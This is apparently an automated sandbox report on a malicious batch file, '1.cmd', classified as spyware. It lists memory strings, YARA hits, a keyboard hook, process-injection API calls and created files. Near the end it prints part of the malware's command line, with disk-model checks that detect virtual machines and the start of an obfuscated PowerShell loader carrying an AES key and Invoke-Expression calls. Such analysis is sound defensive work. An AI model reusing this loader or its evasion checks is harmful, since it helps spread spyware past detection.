Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Contains functionality to call native functions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0FF4 NtResumeThread,	36_2_00007FFD9B8C0FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0F30 NtSetContextThread,	36_2_00007FFD9B8C0F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,	36_2_00007FFD9B8C0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,	36_2_00007FFD9B8BE0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,	36_2_00007FFD9B8C0A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,	36_2_00007FFD9B8BE088
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	39_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,	40_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	42_2_000002BAAEE42C80
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,	45_2_0000016CE6532300

Creates files inside the system directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Deletes files inside the Windows folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1

Detected potential crypto function

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCC94	19_3_00000224138DCC94
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138D23F0	19_3_00000224138D23F0
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCE18	19_3_00000224138DCE18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413902FF0	19_2_0000022413902FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413932FF0	19_2_0000022413932FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CE18	20_3_000002BCD7E0CE18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CC94	20_3_000002BCD7E0CC94
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E023F0	20_3_000002BCD7E023F0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E32FF0	20_2_000002BCD7E32FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE3D2	36_2_00007FFD9B8BE3D2
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CE18	37_3_0000026504E7CE18
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CC94	37_3_0000026504E7CC94
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E723F0	37_3_0000026504E723F0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894	37_2_0000026504EAD894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA2FF0	37_2_0000026504EA2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CC94	38_3_0000025DC1A9CC94
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A923F0	38_3_0000025DC1A923F0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CE18	38_3_0000025DC1A9CE18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001CF0	38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002D4C	38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140003204	38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002434	38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001274	38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC2FF0	38_2_0000025DC1AC2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE2FF0	38_2_0000025DC1CE2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CE18	39_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC6123F0	39_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CC94	39_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642FF0	39_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC672FF0	39_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCE18	40_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCC94	40_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0AB23F0	40_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894	40_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2FF0	40_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCE18	41_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612D23F0	41_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCC94	41_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661302FF0	41_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCE18	42_3_000002BAAEDBCE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDB23F0	42_3_000002BAAEDB23F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCC94	42_3_000002BAAEDBCC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CE18	42_3_000002BAAED8CE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED823F0	42_3_000002BAAED823F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CC94	42_3_000002BAAED8CC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC2FF0	42_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42FF0	42_2_000002BAAEE42FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CC94	43_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879923F0	43_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CE18	43_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C2FF0	43_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F42FF0	43_2_0000026A87F42FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CE18	44_3_000001795377CE18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CC94	44_3_000001795377CC94
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_00000179537723F0	44_3_00000179537723F0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A2FF0	44_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894	44_2_00000179537DD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D2FF0	44_2_00000179537D2FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CC94	45_3_0000016CE5E2CC94
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E223F0	45_3_0000016CE5E223F0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CE18	45_3_0000016CE5E2CE18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532FF0	45_2_0000016CE6532FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CE18	46_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CC94	46_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D5323F0	46_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894	46_2_000002295D56D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D562FF0	46_2_000002295D562FF0

One or more processes crash

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
Source: unknown	Process created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Yara signature match

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.dr	Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@55/94@1/1

Source: C:\Windows\System32\dllhost.exe

38_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

35_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

35_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20241004

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6260321

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1.cmd

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 